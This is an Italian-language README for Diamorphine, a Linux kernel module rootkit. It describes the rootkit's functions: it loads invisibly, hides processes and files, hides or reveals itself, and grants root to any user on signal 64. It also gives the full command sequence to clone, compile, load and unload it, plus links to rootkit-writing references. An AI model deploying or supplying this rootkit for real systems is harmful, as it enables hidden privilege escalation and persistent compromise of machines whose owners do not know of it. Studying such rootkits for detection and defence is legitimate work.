
LKM rootkit per Linux Kernels 2.6.x/3.x/4.x/5.x/6.x (x86/x86_64 e ARM64)
Diamorphine è un rootkit LKM per kernel Linux 2.6.x/3.x/4.x/5.x/6.x (x86/x86_64 e ARM64)
Quando caricato, il modulo inizia invisibile;
Nascondi/mostra qualsiasi processo inviando il segnale 31;
Inviare il segnale 63 (a qualsiasi pid) rende il modulo (in)visibile;
Inviare il segnale 64 (a qualsiasi pid) rende l'utente specificato root;
I file o le directory che iniziano con MAGIC_PREFIX diventano invisibili;
Verifica se il kernel è 2.6.x/3.x/4.x/5.x/6.x
uname -r
Clona il repository
git clone https://github.com/m0nad/Diamorphine
Entra nella cartella
cd Diamorphine
Compila
make
Carica il modulo (come root)
insmod diamorphine.ko
Il modulo inizia invisibile, per rimuoverlo devi renderlo visibile
kill -63 0
Poi rimuovi il modulo (come root)
rmmod diamorphine
Wikipedia Rootkit https://en.wikipedia.org/wiki/Rootkit
Linux Device Drivers http://lwn.net/Kernel/LDD3/
LKM HACKING https://web.archive.org/web/20140701183221/https://www.thc.org/papers/LKM_HACKING.html
Blog di Memset http://memset.wordpress.com/
Linux on-the-fly kernel patching without LKM http://phrack.org/issues/58/7.html
SCRIVERE UN SEMPLICE ROOTKIT PER LINUX https://web.archive.org/web/20160620231623/http://big-daddy.fr/repository/Documentation/Hacking/Security/Malware/Rootkits/writing-rootkit.txt
Linux Cross Reference http://lxr.free-electrons.com/
zizzu0 LinuxKernelModules https://github.com/zizzu0/LinuxKernelModules/
Rootkit Linux: Nuovi metodi per kernel 5.7+ https://xcellerator.github.io/posts/linux_rootkits_11/
FlipSwitch: una nuova tecnica di hooking delle syscall https://www.elastic.co/security-labs/flipswitch-linux-rootkit